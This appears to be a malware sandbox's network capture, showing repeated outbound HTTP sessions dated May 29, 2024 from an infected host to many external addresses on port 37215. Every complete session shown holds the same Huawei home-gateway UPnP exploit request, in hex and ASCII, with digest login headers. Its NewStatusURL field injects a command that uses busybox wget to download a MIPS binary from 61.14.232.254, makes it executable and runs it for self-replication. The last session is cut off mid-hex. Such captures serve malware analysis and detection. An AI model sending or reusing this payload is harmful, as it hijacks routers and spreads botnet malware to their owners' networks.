                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  214192.168.2.1339526157.10.2.13537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.667098999 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  215192.168.2.133836441.65.5.17337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.667151928 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  216192.168.2.133954041.123.196.8237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.667216063 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  217192.168.2.134265841.36.63.16937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.667221069 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  218192.168.2.1358548197.84.139.23937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.667258978 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  219192.168.2.1338188157.26.84.17137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.667280912 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  220192.168.2.1349176197.243.213.17237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.667303085 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  221192.168.2.1337340197.140.240.9037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.667330027 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  222192.168.2.134786041.143.159.11237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.667354107 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  223192.168.2.135706641.162.183.16837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.667371988 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 